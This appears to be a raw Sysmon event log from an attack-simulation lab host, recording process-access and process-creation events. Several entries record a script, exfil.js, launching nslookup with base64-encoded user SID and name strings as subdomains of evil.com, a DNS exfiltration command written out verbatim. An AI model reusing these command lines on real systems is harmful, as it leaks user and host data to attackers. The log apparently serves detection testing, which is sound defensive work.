C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmqmqn.tmp 2>&1 10341000x8000000000000000212422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.838{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0E45-000000005F02}8112C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.838{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0E45-000000005F02}8112C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.838{2E1864BB-18F5-629A-0E45-000000005F02}81126396C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0D45-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.838{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0E45-000000005F02}8112C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0D45-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-18E0-629A-6742-000000005F02}39766260C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-0D45-000000005F02}4052C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.820{2E1864BB-18F5-629A-0D45-000000005F02}4052C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltmqmqn.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.806{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluuapci.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000212410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-18F5-629A-0B45-000000005F02}47285272C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0C45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0C45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.769{2E1864BB-18F5-629A-0A45-000000005F02}66727580C:\Windows\system32\cmd.exe{2E1864BB-18F5-629A-0C45-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.778{2E1864BB-18F5-629A-0C45-000000005F02}5404C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F5-629A-0A45-000000005F02}6672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluuapci.tmp 2>&1 10341000x8000000000000000212402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.754{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0B45-000000005F02}4728C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.754{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F5-629A-0B45-000000005F02}4728C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.738{2E1864BB-18F5-629A-0B45-000000005F02}47285272C:\Windows\system32\conhost.exe{2E1864BB-18F5-629A-0A45-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.738{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0B45-000000005F02}4728C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.738{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.738{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F5-629A-0A45-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000212393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-18E0-629A-6742-000000005F02}39761096C:\Windows\System32\WScript.exe{2E1864BB-18F5-629A-0A45-000000005F02}6672C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000212392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.737{2E1864BB-18F5-629A-0A45-000000005F02}6672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluuapci.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000212391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:41.723{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlrcjh.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 